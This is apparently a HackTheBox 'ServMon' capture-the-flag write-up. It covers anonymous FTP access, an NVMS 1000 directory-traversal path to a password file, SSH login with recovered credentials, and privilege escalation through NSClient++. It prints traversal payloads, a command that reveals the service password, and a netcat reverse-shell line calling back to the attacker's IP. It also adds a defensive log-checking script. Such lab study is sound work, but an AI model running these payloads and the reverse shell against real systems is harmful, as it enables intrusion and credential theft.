HackTheBox - ServMon

The scan revealed the following services:

21/tcp   open  ftp           Microsoft ftpd 
22/tcp   open  ssh           OpenSSH for_Windows_7.7  
80/tcp   open  http 
135/tcp  open  msrpc         Microsoft Windows RPC 
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn 
445/tcp  open  microsoft-ds? 
5666/tcp open  tcpwrapped 
6699/tcp open  napster? 
8443/tcp open  ssl/https-alt 

The FTP service allows anonymous login, and the following was found there:

FTP 

125 Data connection already open; Transfer starting. 
01-18-20  12:05PM       <DIR>          Users 
    01-18-20  12:06PM       <DIR>          Nadine 
        Confidential.txt 
    01-18-20  12:08PM       <DIR>          Nathan 
        Notes to do.txt 

The contents of the two files are:

kali@kali:~/Desktop$ cat Confidential.txt  

Nathan, 

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder. 

Regards 


Nadine

kali@kali:~/Desktop$ cat Notes\ to\ do.txt  
1) Change the password for NVMS - Complete 
2) Lock down the NSClient Access - Complete 
3) Upload the passwords 
4) Remove public access to NVMS 
5) Place the secret files in SharePoint 

Ports 80 and 8443 run HTTP and HTTPS services respectively, and one of the web services turned out to have a directory traversal vulnerability:

kali@kali:/usr/share/exploitdb$ searchsploit NVMS 
------------------------------------------------------------- ---------------------------------------- 
 Exploit Title                                               |  Path (/usr/share/exploitdb/) 
------------------------------------------------------------- ---------------------------------------- 
 NVMS 1000 - Directory Traversal                              | exploits/hardware/webapps/47774.txt 

Combining this with the two FTP notes, which say the password file was left on the Desktop, the target paths are:

/Users/Nathan/Desktop/Passwords.txt 
/Users/Nathan/Desktop/user.txt 

/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt
/../../../../../../../../../../../../Users/Nathan/Desktop/user.txt
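
The traversal above works because the server joins the requested path onto its web root without normalising it first. As an added defensive example (not part of the original writeup), the following Python resolves a requested path against a web root, rejects anything that escapes it, and runs that check over a few constructed access-log lines; the web root and the log lines are assumptions.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed web root; the page does not give NVMS 1000's install path.
WEB_ROOT = "/srv/nvms/www"

def resolve_request_path(web_root: str, request_path: str) -> Optional[str]:
    """Map a URL path onto web_root.

    Returns the normalised filesystem path when it stays under web_root,
    or None when the request would escape it (directory traversal).
    """
    # Decode twice so double-encoded dots (%252e) are caught as well.
    decoded = unquote(unquote(request_path))
    # Windows hosts such as this one accept backslashes as separators.
    decoded = decoded.replace("\\", "/")
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None

# Request line of a Common Log Format entry, e.g. "GET /path HTTP/1.1".
_REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def flag_traversal(log_lines: List[str], web_root: str = WEB_ROOT) -> List[str]:
    """Return the requested paths in log_lines that would escape web_root."""
    flagged = []
    for line in log_lines:
        m = _REQ.search(line)
        if m and resolve_request_path(web_root, m.group(1)) is None:
            flagged.append(m.group(1))
    return flagged

# Constructed sample log lines, not taken from the box.
SAMPLE_LOG = [
    '10.10.14.231 - - [18/Jan/2020:12:05:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.10.14.231 - - [18/Jan/2020:12:05:09 +0000] "GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 305',
    '10.10.14.231 - - [18/Jan/2020:12:05:15 +0000] "GET /%2e%2e/%2e%2e/Windows/win.ini HTTP/1.1" 404 0',
    '10.10.14.231 - - [18/Jan/2020:12:05:20 +0000] "GET /css/../style.css HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for path in flag_traversal(SAMPLE_LOG):
        print("traversal attempt:", path)
```

A request like /css/../style.css is legitimate and stays inside the root, so only the two escaping paths are flagged.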

1nsp3ctTh3Way2Mars! 
Th3r34r3To0M4nyTrait0r5! 
B3WithM30r4ga1n5tMe 
L1k3B1gBut7s@W0rk 
0nly7h3y0unGWi11F0l10w 
IfH3s4b0Utg0t0H1sH0me 
Gr4etN3w5w17hMySk1Pa5$ 

This yields the passwords. Trying them one by one shows that none of them are for the web services, but one of them works for SSH:

Nadine - L1k3B1gBut7s@W0rk 

kali@kali:/usr/share/exploitdb$ ssh nadine@10.10.10.184 

nadine@10.10.10.184's password:  

Microsoft Windows [Version 10.0.18363.752] 
(c) 2019 Microsoft Corporation. All rights reserved. 

nadine@SERVMON C:\Users\Nadine>dir 
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt 
eb9fb287bc89b939e10c5a9aecf45ac8 

Privilege escalation:
I uploaded WinPEAS.exe, but it did not turn up anything exploitable. Earlier enumeration had shown that the service on port 80 allows local privilege escalation, so that can be used.
Over SSH I retrieved the password of the running service, but could not log in with it: the service only accepts connections from 127.0.0.1.

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display 

Current password: ew2x6SsGTxjRwXOT 

echo c:\temp\nc.exe 10.10.14.231 8989 -e cmd.exe > c:\temp\evil.bat 

Set up a local port forward (an ordinary proxy cannot forward requests destined for the target's own 127.0.0.1):

ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184 

Then create a scheduled task in the service:

Be sure to click Save at every step.

The script runs after one minute.

Administrator privileges obtained:

Overall, the path through this machine is fairly clear and fairly simple.